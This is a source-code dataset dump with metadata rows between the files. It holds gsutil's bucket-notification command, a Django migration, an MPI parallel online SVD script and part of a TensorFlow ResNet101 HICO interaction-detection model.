from gslib.command import Command
from gslib.command import NO_MAX
from gslib.command_argument import CommandArgument
from gslib.cs_api_map import ApiSelector
from gslib.exception import CommandException
from gslib.help_provider import CreateHelpText
from gslib.storage_url import StorageUrlFromString
_WATCHBUCKET_SYNOPSIS = """
gsutil notification watchbucket [-i id] [-t token] app_url bucket_url...
"""
_STOPCHANNEL_SYNOPSIS = """
gsutil notification stopchannel channel_id resource_id
"""
_SYNOPSIS = _WATCHBUCKET_SYNOPSIS + _STOPCHANNEL_SYNOPSIS.lstrip('\n')
_WATCHBUCKET_DESCRIPTION = """
<B>WATCHBUCKET</B>
The watchbucket sub-command can be used to watch a bucket for object changes.
A service account must be used when running this command.
The app_url parameter must be an HTTPS URL to an application that will be
notified of changes to any object in the bucket. The URL endpoint must be
a verified domain on your project. See
`Notification Authorization <https://cloud.google.com/storage/docs/object-change-notification#_Authorization>`_
for details.
The optional id parameter can be used to assign a unique identifier to the
created notification channel. If not provided, a random UUID string will be
generated.
The optional token parameter can be used to validate notifications events.
To do this, set this custom token and store it to later verify that
notification events contain the client token you expect.
"""
_STOPCHANNEL_DESCRIPTION = """
<B>STOPCHANNEL</B>
The stopchannel sub-command can be used to stop sending change events to a
notification channel.
The channel_id and resource_id parameters should match the values from the
response of a bucket watch request.
"""
_DESCRIPTION = """
The notification command can be used to configure notifications.
For more information on the Object Change Notification feature, please see:
https://cloud.google.com/storage/docs/object-change-notification
The notification command has two sub-commands:
""" + _WATCHBUCKET_DESCRIPTION + _STOPCHANNEL_DESCRIPTION + """
<B>EXAMPLES</B>
Watch the bucket example-bucket for changes and send notifications to an
application server running at example.com:
gsutil notification watchbucket https://example.com/notify \\
gs://example-bucket
Assign identifier my-channel-id to the created notification channel:
gsutil notification watchbucket -i my-channel-id \\
https://example.com/notify gs://example-bucket
Set a custom client token that will be included with each notification event:
gsutil notification watchbucket -t my-client-token \\
https://example.com/notify gs://example-bucket
Stop the notification event channel with channel identifier channel1 and
resource identifier SoGqan08XDIFWr1Fv_nGpRJBHh8:
gsutil notification stopchannel channel1 SoGqan08XDIFWr1Fv_nGpRJBHh8
<B>NOTIFICATIONS AND PARALLEL COMPOSITE UPLOADS</B>
By default, gsutil enables parallel composite uploads for large files (see
"gsutil help cp"), which means that an upload of a large object can result
in multiple temporary component objects being uploaded before the actual
intended object is created. Any subscriber to notifications for this bucket
will then see a notification for each of these components being created and
deleted. If this is a concern for you, note that parallel composite uploads
can be disabled by setting "parallel_composite_upload_threshold = 0" in your
boto config file.
"""
NOTIFICATION_AUTHORIZATION_FAILED_MESSAGE = """
Watch bucket attempt failed:
{watch_error}
You attempted to watch a bucket with an application URL of:
{watch_url}
which is not authorized for your project. Please ensure that you are using
Service Account authentication and that the Service Account's project is
authorized for the application URL. Notification endpoint URLs must also be
whitelisted in your Cloud Console project. To do that, the domain must also be
verified using Google Webmain Tools. For instructions, please see:
https://cloud.google.com/storage/docs/object-change-notification#_Authorization
"""
_DETAILED_HELP_TEXT = CreateHelpText(_SYNOPSIS, _DESCRIPTION)
_watchbucket_help_text = (
CreateHelpText(_WATCHBUCKET_SYNOPSIS, _WATCHBUCKET_DESCRIPTION))
_stopchannel_help_text = (
CreateHelpText(_STOPCHANNEL_SYNOPSIS, _STOPCHANNEL_DESCRIPTION))
class NotificationCommand(Command):
"""Implementation of gsutil notification command."""
# Command specification. See base class for documentation.
command_spec = Command.CreateCommandSpec(
'notification',
command_name_aliases=[
'notify', 'notifyconfig', 'notifications', 'notif'],
usage_synopsis=_SYNOPSIS,
min_args=3,
max_args=NO_MAX,
supported_sub_args='i:t:',
file_url_ok=False,
provider_url_ok=False,
urls_start_arg=1,
gs_api_support=[ApiSelector.JSON],
gs_default_api=ApiSelector.JSON,
argparse_arguments={
'watchbucket': [
CommandArgument.MakeFreeTextArgument(),
CommandArgument.MakeZeroOrMoreCloudBucketURLsArgument()
],
'stopchannel': []
}
)
# Help specification. See help_provider.py for documentation.
help_spec = Command.HelpSpec(
help_name='notification',
help_name_aliases=['watchbucket', 'stopchannel', 'notifyconfig'],
help_type='command_help',
help_one_line_summary='Configure object change notification',
help_text=_DETAILED_HELP_TEXT,
subcommand_help_text={'watchbucket': _watchbucket_help_text,
'stopchannel': _stopchannel_help_text},
)
def _WatchBucket(self):
"""Creates a watch on a bucket given in self.args."""
self.CheckArguments()
identifier = None
client_token = None
if self.sub_opts:
for o, a in self.sub_opts:
if o == '-i':
identifier = a
if o == '-t':
client_token = a
identifier = identifier or str(uuid.uuid4())
watch_url = self.args[0]
bucket_arg = self.args[-1]
if not watch_url.lower().startswith('https://'):
raise CommandException('The application URL must be an https:// URL.')
bucket_url = StorageUrlFromString(bucket_arg)
if not (bucket_url.IsBucket() and bucket_url.scheme == 'gs'):
raise CommandException(
'The %s command can only be used with gs:// bucket URLs.' %
self.command_name)
if not bucket_url.IsBucket():
raise CommandException('URL must name a bucket for the %s command.' %
self.command_name)
self.logger.info('Watching bucket %s with application URL %s ...',
bucket_url, watch_url)
try:
channel = self.gsutil_api.WatchBucket(
bucket_url.bucket_name, watch_url, identifier, token=client_token,
provider=bucket_url.scheme)
except AccessDeniedException, e:
self.logger.warn(NOTIFICATION_AUTHORIZATION_FAILED_MESSAGE.format(
watch_error=str(e), watch_url=watch_url))
raise
channel_id = channel.id
resource_id = channel.resourceId
client_token = channel.token
self.logger.info('Successfully created watch notification channel.')
self.logger.info('Watch channel identifier: %s', channel_id)
self.logger.info('Canonicalized resource identifier: %s', resource_id)
self.logger.info('Client state token: %s', client_token)
return 0
def _StopChannel(self):
channel_id = self.args[0]
resource_id = self.args[1]
self.logger.info('Removing channel %s with resource identifier %s ...',
channel_id, resource_id)
self.gsutil_api.StopChannel(channel_id, resource_id, provider='gs')
self.logger.info('Succesfully removed channel.')
return 0
def _RunSubCommand(self, func):
try:
(self.sub_opts, self.args) = getopt.getopt(
self.args, self.command_spec.supported_sub_args)
# Commands with both suboptions and subcommands need to reparse for
# suboptions, so we log again.
metrics.LogCommandParams(sub_opts=self.sub_opts)
return func()
except getopt.GetoptError, e:
self.RaiseInvalidArgumentException()
def RunCommand(self):
"""Command entry point for the notification command."""
subcommand = self.args.pop(0)
if subcommand == 'watchbucket':
metrics.LogCommandParams(subcommands=[subcommand])
return self._RunSubCommand(self._WatchBucket)
elif subcommand == 'stopchannel':
metrics.LogCommandParams(subcommands=[subcommand])
return self._RunSubCommand(self._StopChannel)
else:
raise CommandException('Invalid subcommand "%s" for the %s command.' %
(subcommand, self.command_name))
| 36.638783 | 113 | 0.732669 | 1,219 | 9,636 | 5.654635 | 0.274815 | 0.013057 | 0.014217 | 0.007979 | 0.109386 | 0.072247 | 0.066154 | 0.050486 | 0.029885 | 0.029885 | 0 | 0.003843 | 0.189809 | 9,636 | 262 | 114 | 36.778626 | 0.879083 | 0.083333 | 0 | 0.085106 | 0 | 0.005319 | 0.485335 | 0.010591 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.06383 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
62098ed13ce2805c2274aa650c177f0c748ff79f | 401 | py | Python | projects/migrations/0017_project_status_isvalidated.py | joatuapp/joatu-django | 5626d03ba89c55650ff5bff2e706ca0883ae3b9c | [
"MIT"
] | 10 | 2018-05-13T18:01:57.000Z | 2018-12-23T17:11:14.000Z | projects/migrations/0017_project_status_isvalidated.py | moileretour/joatu | 9d18cb58b4280235688e269be6fd2d34b77ccead | [
"MIT"
] | 88 | 2018-05-04T15:33:46.000Z | 2022-03-08T21:09:21.000Z | projects/migrations/0017_project_status_isvalidated.py | joatuapp/joatu-django | 5626d03ba89c55650ff5bff2e706ca0883ae3b9c | [
"MIT"
] | 7 | 2018-05-08T16:05:06.000Z | 2018-09-13T05:49:05.000Z | # Generated by Django 2.0.3 on 2018-03-26 01:17
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('projects', '0016_auto_20180325_2116'),
]
operations = [
migrations.AddField(
model_name='project_status',
name='isValidated',
field=models.BooleanField(default=False),
),
]
| 21.105263 | 53 | 0.613466 | 42 | 401 | 5.738095 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.106897 | 0.276808 | 401 | 18 | 54 | 22.277778 | 0.724138 | 0.112219 | 0 | 0 | 1 | 0 | 0.158192 | 0.064972 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6218792313b28bf05b712a8e421f24aaaa0f9100 | 8,110 | py | Python | Parallel_POD/online_svd_parallel.py | Romit-Maulik/Tutorials-Demos-Practice | a58ddc819f24a16f7059e63d7f201fc2cd23e03a | [
"MIT"
] | 8 | 2020-09-02T14:46:07.000Z | 2021-11-29T15:27:05.000Z | Parallel_POD/online_svd_parallel.py | omersan/Practice | 77eecdc2a202e6b333123cfd92e7db6dc0eea021 | [
"MIT"
] | 18 | 2020-11-13T18:49:33.000Z | 2022-03-12T00:54:43.000Z | Parallel_POD/online_svd_parallel.py | omersan/Practice | 77eecdc2a202e6b333123cfd92e7db6dc0eea021 | [
"MIT"
] | 5 | 2019-09-25T23:57:00.000Z | 2021-04-18T08:15:34.000Z | import numpy as np
np.random.seed(10)
import matplotlib.pyplot as plt
from mpi4py import MPI
# For shared memory deployment: `export OPENBLAS_NUM_THREADS=1`
# Method of snapshots
def generate_right_vectors(A):
'''
A - Snapshot matrix - shape: NxS
returns V - truncated right singular vectors
'''
new_mat = np.matmul(np.transpose(A),A)
w, v = np.linalg.eig(new_mat)
svals = np.sqrt(np.abs(w))
rval = np.argmax(svals<0.0001) # eps0
return v[:,:rval], np.sqrt(np.abs(w[:rval])) # Covariance eigenvectors, singular values
# Randomized SVD to accelerate
def low_rank_svd(A,K):
M = A.shape[0]
N = A.shape[1]
omega = np.random.normal(size=(N,2*K))
omega_pm = np.matmul(A,np.transpose(A))
Y = np.matmul(omega_pm,np.matmul(A,omega))
Qred, Rred = np.linalg.qr(Y)
B = np.matmul(np.transpose(Qred),A)
ustar, snew, _ = np.linalg.svd(B)
unew = np.matmul(Qred,ustar)
unew = unew[:,:K]
snew = snew[:K]
return unew, snew
# Check orthogonality
def check_ortho(modes,num_modes):
for m1 in range(num_modes):
for m2 in range(num_modes):
if m1 == m2:
s_ = np.sum(modes[:,m1]*modes[:,m2])
if not np.isclose(s_,1.0):
print('Orthogonality check failed')
break
else:
s_ = np.sum(modes[:,m1]*modes[:,m2])
if not np.isclose(s_,0.0):
print('Orthogonality check failed')
break
print('Orthogonality check passed successfully')
class online_svd_calculator(object):
"""
docstring for online_svd_calculator:
K : Number of modes to truncate
ff : Forget factor
"""
def __init__(self, K, ff, low_rank=False):
super(online_svd_calculator, self).__init__()
self.K = K
self.ff = ff
# Initialize MPI
self.comm = MPI.COMM_WORLD
self.rank = self.comm.Get_rank()
self.nprocs = self.comm.Get_size()
self.iteration = 0
self.low_rank = low_rank
# Initialize
def initialize(self, A):
self.ulocal, self.svalue = self.parallel_svd(A)
def parallel_qr(self,A):
# Perform the local QR
q, r = np.linalg.qr(A)
rlocal_shape_0 = r.shape[0]
rlocal_shape_1 = r.shape[1]
# Gather data at rank 0:
r_global = self.comm.gather(r,root=0)
# perform SVD at rank 0:
if self.rank == 0:
temp = r_global[0]
for i in range(self.nprocs-1):
temp = np.concatenate((temp,r_global[i+1]),axis=0)
r_global = temp
qglobal, rfinal = np.linalg.qr(r_global)
qglobal = -qglobal # Trick for consistency
rfinal = -rfinal
# For this rank
qlocal = np.matmul(q,qglobal[:rlocal_shape_0])
# send to other ranks
for rank in range(1,self.nprocs):
self.comm.send(qglobal[rank*rlocal_shape_0:(rank+1)*rlocal_shape_0], dest=rank, tag=rank+10)
# Step b of Levy-Lindenbaum - small operation
if self.low_rank:
# Low rank SVD
unew, snew = low_rank_svd(rfinal,self.K)
else:
unew, snew, _ = np.linalg.svd(rfinal)
else:
# Receive qglobal slices from other ranks
qglobal = self.comm.recv(source=0, tag=self.rank+10)
# For this rank
qlocal = np.matmul(q,qglobal)
# To receive new singular vectors
unew = None
snew = None
unew = self.comm.bcast(unew,root=0)
snew = self.comm.bcast(snew,root=0)
return qlocal, unew, snew
def parallel_svd(self,A):
vlocal, slocal = generate_right_vectors(A)
# Find Wr
wlocal = np.matmul(vlocal,np.diag(slocal).T)
# Gather data at rank 0:
wglobal = self.comm.gather(wlocal,root=0)
# perform SVD at rank 0:
if self.rank == 0:
temp = wglobal[0]
for i in range(self.nprocs-1):
temp = np.concatenate((temp,wglobal[i+1]),axis=-1)
wglobal = temp
if self.low_rank:
x, s = low_rank_svd(wglobal,self.K)
else:
x, s, y = np.linalg.svd(wglobal)
else:
x = None
s = None
x = self.comm.bcast(x,root=0)
s = self.comm.bcast(s,root=0)
# # Find truncation threshold
# s_ratio = np.cumsum(s)/np.sum(s)
# rval = np.argmax(1.0-s_ratio<0.0001) # eps1
# perform APMOS at each local rank
phi_local = []
for mode in range(self.K):
phi_temp = 1.0/s[mode]*np.matmul(A,x[:,mode:mode+1])
phi_local.append(phi_temp)
temp = phi_local[0]
for i in range(self.K-1):
temp = np.concatenate((temp,phi_local[i+1]),axis=-1)
return temp, s[:self.K] #
def incorporate_data(self,A):
self.iteration+=1
ll = self.ff*np.matmul(self.ulocal,np.diag(self.svalue))
ll = np.concatenate((ll,A),axis=-1)
qlocal, utemp, self.svalue = self.parallel_qr(ll)
self.ulocal = np.matmul(qlocal,utemp)
def gather_modes(self):
# Gather modes at rank 0
# This is automatically in order
phi_global = self.comm.gather(self.ulocal,root=0)
if self.rank == 0:
phi = phi_global[0]
for i in range(self.nprocs-1):
phi = np.concatenate((phi,phi_global[i+1]),axis=0)
np.save('Online_Parallel_POD.npy',phi)
np.save('Online_Parallel_SingularValues.npy',self.svalue)
# Validate
serial = np.load('Serial_Modes_MOS.npy')
parallel_online = np.load('Online_Parallel_POD.npy')
serial_online = np.load('Online_Serial_POD.npy')
plt.figure()
plt.plot(serial[:,0],label='serial one-shot')
plt.plot(parallel_online[:,0],label='parallel_online')
plt.plot(serial_online[:,0],label='serial_online')
plt.title('U comparison - column 0')
plt.xlabel('Domain')
plt.ylabel('U magnitude')
plt.legend()
plt.figure()
plt.plot(serial[:,2],label='serial one-shot')
plt.plot(parallel_online[:,2],label='parallel_online')
plt.plot(serial_online[:,2],label='serial_online')
plt.title('U comparison - column 2')
plt.xlabel('Domain')
plt.ylabel('U magnitude')
plt.legend()
serial_svs = np.load('Serial_SingularValues.npy')
serial_online_svs = np.load('Online_Serial_SingularValues.npy')
parallel_online_svs = np.load('Online_Parallel_SingularValues.npy')
plt.figure()
plt.plot(serial_svs[:self.K],label='serial one-shot')
plt.plot(parallel_online_svs[:self.K],label='parallel_online')
plt.plot(serial_online_svs[:self.K],label='serial_online')
plt.title('Singular values')
plt.xlabel('Index')
plt.ylabel('Magnitude')
plt.legend()
plt.show()
# Check orthogonality - should all be successful
check_ortho(serial,self.K)
check_ortho(serial_online,self.K)
check_ortho(parallel_online,self.K)
if __name__ == '__main__':
from time import time
# Initialize timer
start_time = time()
test_class = online_svd_calculator(10,1.0,low_rank=True)
iteration = 0
data = np.load('points_rank_'+str(test_class.rank)+'_batch_'+str(iteration)+'.npy')
test_class.initialize(data)
for iteration in range(1,4):
data = np.load('points_rank_'+str(test_class.rank)+'_batch_'+str(iteration)+'.npy')
test_class.incorporate_data(data)
end_time = time()
print('Time required for parallel streaming SVD (each rank):', end_time-start_time)
test_class.gather_modes() | 30.954198 | 108 | 0.569667 | 1,086 | 8,110 | 4.11326 | 0.208103 | 0.014551 | 0.017461 | 0.006268 | 0.29259 | 0.231028 | 0.193418 | 0.167898 | 0.108126 | 0.081039 | 0 | 0.017638 | 0.307891 | 8,110 | 262 | 109 | 30.954198 | 0.778193 | 0.117386 | 0 | 0.189024 | 1 | 0 | 0.091487 | 0.027107 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054878 | false | 0.006098 | 0.02439 | 0 | 0.109756 | 0.02439 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
621946fa869b479764d5f279c948e790f062b5f0 | 32,670 | py | Python | lib/networks/ResNet101_HICO.py | zhihou7/VCL | 1bc21ec64d3bae15b8bac524cfa4beeaf08f2c48 | [
"MIT"
] | 29 | 2020-07-28T03:11:21.000Z | 2022-03-09T04:37:47.000Z | lib/networks/ResNet101_HICO.py | zhihou7/VCL | 1bc21ec64d3bae15b8bac524cfa4beeaf08f2c48 | [
"MIT"
] | 8 | 2020-08-19T06:40:42.000Z | 2022-03-07T03:48:57.000Z | lib/networks/ResNet101_HICO.py | zhihou7/VCL | 1bc21ec64d3bae15b8bac524cfa4beeaf08f2c48 | [
"MIT"
] | 7 | 2020-07-20T09:05:17.000Z | 2021-11-26T13:04:25.000Z | # --------------------------------------------------------
# Tensorflow VCL
# Licensed under The MIT License [see LICENSE for details]
# Written by Zhi Hou, based on code from Transferable-Interactiveness-Network, Chen Gao, Zheqi he and Xinlei Chen
# --------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import tensorflow.contrib.slim as slim
from tensorflow.contrib.slim import arg_scope
from tensorflow.contrib.slim.python.slim.nets import resnet_utils
from tensorflow.contrib.slim.python.slim.nets import resnet_v1
from tensorflow.python.framework import ops
from ult.tools import get_convert_matrix
from ult.config import cfg
from ult.visualization import draw_bounding_boxes_HOI
import numpy as np
def resnet_arg_scope(is_training=True,
weight_decay=cfg.TRAIN.WEIGHT_DECAY,
batch_norm_decay=0.997,
batch_norm_epsilon=1e-5,
batch_norm_scale=True):
batch_norm_params = {
'is_training': False,
'decay': batch_norm_decay,
'epsilon': batch_norm_epsilon,
'scale': batch_norm_scale,
'trainable': False,
'updates_collections': ops.GraphKeys.UPDATE_OPS
}
with arg_scope(
[slim.conv2d, slim.fully_connected],
weights_regularizer = tf.contrib.layers.l2_regularizer(cfg.TRAIN.WEIGHT_DECAY),
weights_initializer = slim.variance_scaling_initializer(),
biases_regularizer = tf.contrib.layers.l2_regularizer(cfg.TRAIN.WEIGHT_DECAY),
biases_initializer = tf.constant_initializer(0.0),
trainable = is_training,
activation_fn = tf.nn.relu,
normalizer_fn = slim.batch_norm,
normalizer_params = batch_norm_params):
with arg_scope([slim.batch_norm], **batch_norm_params) as arg_sc:
return arg_sc
class ResNet101():
def __init__(self, model_name):
self.model_name = model_name
self.visualize = {}
self.test_visualize = {}
self.intermediate = {}
self.predictions = {}
self.score_summaries = {}
self.event_summaries = {}
self.train_summaries = []
self.losses = {}
self.image = tf.placeholder(tf.float32, shape=[1, None, None, 3], name = 'image')
self.spatial = tf.placeholder(tf.float32, shape=[None, 64, 64, 3], name = 'sp')
self.H_boxes = tf.placeholder(tf.float32, shape=[None, 5], name = 'H_boxes')
self.O_boxes = tf.placeholder(tf.float32, shape=[None, 5], name = 'O_boxes')
self.gt_class_HO = tf.placeholder(tf.float32, shape=[None, 600], name = 'gt_class_HO')
self.H_num = tf.placeholder(tf.int32) # positive nums
self.image_id = tf.placeholder(tf.int32)
self.num_classes = 600
self.compose_num_classes = 600
self.num_fc = 1024
self.verb_num_classes = 117
self.obj_num_classes = 80
self.scope = 'resnet_v1_101'
self.stride = [16, ]
self.lr = tf.placeholder(tf.float32)
if tf.__version__ == '1.1.0':
raise Exception('wrong tensorflow version 1.1.0')
else:
from tensorflow.contrib.slim.python.slim.nets.resnet_v1 import resnet_v1_block
self.blocks = [resnet_v1_block('block1', base_depth=64, num_units=3, stride=2),
resnet_v1_block('block2', base_depth=128, num_units=4, stride=2),
resnet_v1_block('block3', base_depth=256, num_units=23, stride=1),
resnet_v1_block('block4', base_depth=512, num_units=3, stride=1),
resnet_v1_block('block5', base_depth=512, num_units=3, stride=1)]
if self.model_name.__contains__('unique_weights') or self.model_name.__contains__('_pa3')\
or self.model_name.__contains__('_pa4'):
print("add block6 unique_weights2")
self.blocks.append(resnet_v1_block('block6', base_depth=512, num_units=3, stride=1))
"""We copy from TIN. calculated by log(1/(n_c/sum(n_c)) c is the category and n_c is
the number of positive samples"""
self.HO_weight = np.array([
9.192927, 9.778443, 10.338059, 9.164914, 9.075144, 10.045923, 8.714437, 8.59822, 12.977117, 6.2745423,
11.227917, 6.765012, 9.436157, 9.56762, 11.0675745, 11.530198, 9.609821, 9.897503, 6.664475, 6.811699,
6.644726, 9.170454, 13.670264, 3.903943, 10.556748, 8.814335, 9.519224, 12.753973, 11.590822, 8.278912,
5.5245695, 9.7286825, 8.997436, 10.699849, 9.601237, 11.965516, 9.192927, 10.220277, 6.056692, 7.734048,
8.42324, 6.586457, 6.969533, 10.579222, 13.670264, 4.4531965, 9.326459, 9.288238, 8.071842, 10.431585,
12.417501, 11.530198, 11.227917, 4.0678477, 8.854023, 12.571651, 8.225684, 10.996116, 11.0675745,
10.100731,
7.0376034, 7.463688, 12.571651, 14.363411, 5.4902234, 11.0675745, 14.363411, 8.45805, 10.269067,
9.820116,
14.363411, 11.272368, 11.105314, 7.981595, 9.198626, 3.3284247, 14.363411, 12.977117, 9.300817,
10.032678,
12.571651, 10.114916, 10.471591, 13.264799, 14.363411, 8.01953, 10.412168, 9.644913, 9.981384,
7.2197933,
14.363411, 3.1178555, 11.031207, 8.934066, 7.546675, 6.386472, 12.060826, 8.862153, 9.799063, 12.753973,
12.753973, 10.412168, 10.8976755, 10.471591, 12.571651, 9.519224, 6.207762, 12.753973, 6.60636,
6.2896967,
4.5198326, 9.7887, 13.670264, 11.878505, 11.965516, 8.576513, 11.105314, 9.192927, 11.47304, 11.367679,
9.275815, 11.367679, 9.944571, 11.590822, 10.451388, 9.511381, 11.144535, 13.264799, 5.888291,
11.227917,
10.779892, 7.643191, 11.105314, 9.414651, 11.965516, 14.363411, 12.28397, 9.909063, 8.94731, 7.0330057,
8.129001, 7.2817025, 9.874775, 9.758241, 11.105314, 5.0690055, 7.4768796, 10.129305, 9.54313, 13.264799,
9.699972, 11.878505, 8.260853, 7.1437693, 6.9321113, 6.990665, 8.8104515, 11.655361, 13.264799,
4.515912,
9.897503, 11.418972, 8.113436, 8.795067, 10.236277, 12.753973, 14.363411, 9.352776, 12.417501,
0.6271591,
12.060826, 12.060826, 12.166186, 5.2946343, 11.318889, 9.8308115, 8.016022, 9.198626, 10.8976755,
13.670264,
11.105314, 14.363411, 9.653881, 9.503599, 12.753973, 5.80546, 9.653881, 9.592727, 12.977117, 13.670264,
7.995224, 8.639826, 12.28397, 6.586876, 10.929424, 13.264799, 8.94731, 6.1026597, 12.417501, 11.47304,
10.451388, 8.95624, 10.996116, 11.144535, 11.031207, 13.670264, 13.670264, 6.397866, 7.513285, 9.981384,
11.367679, 11.590822, 7.4348736, 4.415428, 12.166186, 8.573451, 12.977117, 9.609821, 8.601359, 9.055143,
11.965516, 11.105314, 13.264799, 5.8201604, 10.451388, 9.944571, 7.7855496, 14.363411, 8.5463,
13.670264,
7.9288645, 5.7561946, 9.075144, 9.0701065, 5.6871653, 11.318889, 10.252538, 9.758241, 9.407584,
13.670264,
8.570397, 9.326459, 7.488179, 11.798462, 9.897503, 6.7530537, 4.7828183, 9.519224, 7.6492405, 8.031909,
7.8180614, 4.451856, 10.045923, 10.83705, 13.264799, 13.670264, 4.5245686, 14.363411, 10.556748,
10.556748,
14.363411, 13.670264, 14.363411, 8.037262, 8.59197, 9.738439, 8.652985, 10.045923, 9.400566, 10.9622135,
11.965516, 10.032678, 5.9017305, 9.738439, 12.977117, 11.105314, 10.725825, 9.080208, 11.272368,
14.363411,
14.363411, 13.264799, 6.9279733, 9.153925, 8.075553, 9.126969, 14.363411, 8.903826, 9.488214, 5.4571533,
10.129305, 10.579222, 12.571651, 11.965516, 6.237189, 9.428937, 9.618479, 8.620408, 11.590822,
11.655361,
9.968962, 10.8080635, 10.431585, 14.363411, 3.796231, 12.060826, 10.302968, 9.551227, 8.75394,
10.579222,
9.944571, 14.363411, 6.272396, 10.625742, 9.690582, 13.670264, 11.798462, 13.670264, 11.724354,
9.993963,
8.230013, 9.100721, 10.374427, 7.865129, 6.514087, 14.363411, 11.031207, 11.655361, 12.166186, 7.419324,
9.421769, 9.653881, 10.996116, 12.571651, 13.670264, 5.912144, 9.7887, 8.585759, 8.272101, 11.530198,
8.886948,
5.9870906, 9.269661, 11.878505, 11.227917, 13.670264, 8.339964, 7.6763024, 10.471591, 10.451388,
13.670264,
11.185357, 10.032678, 9.313555, 12.571651, 3.993144, 9.379805, 9.609821, 14.363411, 9.709451, 8.965248,
10.451388, 7.0609145, 10.579222, 13.264799, 10.49221, 8.978916, 7.124196, 10.602211, 8.9743395, 7.77862,
8.073695, 9.644913, 9.339531, 8.272101, 4.794418, 9.016304, 8.012526, 10.674532, 14.363411, 7.995224,
12.753973, 5.5157638, 8.934066, 10.779892, 7.930471, 11.724354, 8.85808, 5.9025764, 14.363411,
12.753973,
12.417501, 8.59197, 10.513264, 10.338059, 14.363411, 7.7079706, 14.363411, 13.264799, 13.264799,
10.752493,
14.363411, 14.363411, 13.264799, 12.417501, 13.670264, 6.5661197, 12.977117, 11.798462, 9.968962,
12.753973,
11.47304, 11.227917, 7.6763024, 10.779892, 11.185357, 14.363411, 7.369478, 14.363411, 9.944571,
10.779892,
10.471591, 9.54313, 9.148476, 10.285873, 10.412168, 12.753973, 14.363411, 6.0308623, 13.670264,
10.725825,
12.977117, 11.272368, 7.663911, 9.137665, 10.236277, 13.264799, 6.715625, 10.9622135, 14.363411,
13.264799,
9.575919, 9.080208, 11.878505, 7.1863923, 9.366199, 8.854023, 9.874775, 8.2857685, 13.670264, 11.878505,
12.166186, 7.616999, 9.44343, 8.288065, 8.8104515, 8.347254, 7.4738197, 10.302968, 6.936267, 11.272368,
7.058223, 5.0138307, 12.753973, 10.173757, 9.863602, 11.318889, 9.54313, 10.996116, 12.753973,
7.8339925,
7.569945, 7.4427395, 5.560738, 12.753973, 10.725825, 10.252538, 9.307165, 8.491293, 7.9161053,
7.8849015,
7.782772, 6.3088884, 8.866243, 9.8308115, 14.363411, 10.8976755, 5.908519, 10.269067, 9.176025,
9.852551,
9.488214, 8.90809, 8.537411, 9.653881, 8.662968, 11.965516, 10.143904, 14.363411, 14.363411, 9.407584,
5.281472, 11.272368, 12.060826, 14.363411, 7.4135547, 8.920994, 9.618479, 8.891141, 14.363411,
12.060826,
11.965516, 10.9622135, 10.9622135, 14.363411, 5.658909, 8.934066, 12.571651, 8.614018, 11.655361,
13.264799,
10.996116, 13.670264, 8.965248, 9.326459, 11.144535, 14.363411, 6.0517673, 10.513264, 8.7430105,
10.338059,
13.264799, 6.878481, 9.065094, 8.87035, 14.363411, 9.92076, 6.5872955, 10.32036, 14.363411, 9.944571,
11.798462, 10.9622135, 11.031207, 7.652888, 4.334878, 13.670264, 13.670264, 14.363411, 10.725825,
12.417501,
14.363411, 13.264799, 11.655361, 10.338059, 13.264799, 12.753973, 8.206432, 8.916674, 8.59509,
14.363411,
7.376845, 11.798462, 11.530198, 11.318889, 11.185357, 5.0664344, 11.185357, 9.372978, 10.471591,
9.6629305,
11.367679, 8.73579, 9.080208, 11.724354, 5.04781, 7.3777695, 7.065643, 12.571651, 11.724354, 12.166186,
12.166186, 7.215852, 4.374113, 11.655361, 11.530198, 14.363411, 6.4993753, 11.031207, 8.344818,
10.513264,
10.032678, 14.363411, 14.363411, 4.5873594, 12.28397, 13.670264, 12.977117, 10.032678, 9.609821
], dtype='float32').reshape(1, 600)
num_inst_path = cfg.ROOT_DIR + '/Data/num_inst.npy'
num_inst = np.load(num_inst_path)
self.num_inst = num_inst
verb_to_HO_matrix, obj_to_HO_matrix = get_convert_matrix(self.verb_num_classes, self.obj_num_classes)
self.obj_to_HO_matrix = tf.constant(obj_to_HO_matrix, tf.float32)
self.verb_to_HO_matrix = tf.constant(verb_to_HO_matrix, tf.float32)
self.gt_obj_class = tf.cast(tf.matmul(self.gt_class_HO, self.obj_to_HO_matrix, transpose_b=True) > 0,
tf.float32)
self.gt_verb_class = tf.cast(tf.matmul(self.gt_class_HO, self.verb_to_HO_matrix, transpose_b=True) > 0,
tf.float32)
def init_table(self):
pass
def set_ph(self, image, image_id, num_pos, Human_augmented, Object_augmented, action_HO, sp):
if image is not None: self.image = image
if image_id is not None: self.image_id = image_id
if sp is not None: self.spatial = sp
if Human_augmented is not None: self.H_boxes = Human_augmented
if Object_augmented is not None: self.O_boxes = Object_augmented
if action_HO is not None: self.gt_class_HO = action_HO
self.H_num = num_pos
self.reset_classes()
def reset_classes(self):
from ult.tools import get_convert_matrix
verb_to_HO_matrix, obj_to_HO_matrix = get_convert_matrix(self.verb_num_classes, self.obj_num_classes)
self.obj_to_HO_matrix = tf.constant(obj_to_HO_matrix, tf.float32)
self.verb_to_HO_matrix = tf.constant(verb_to_HO_matrix, tf.float32)
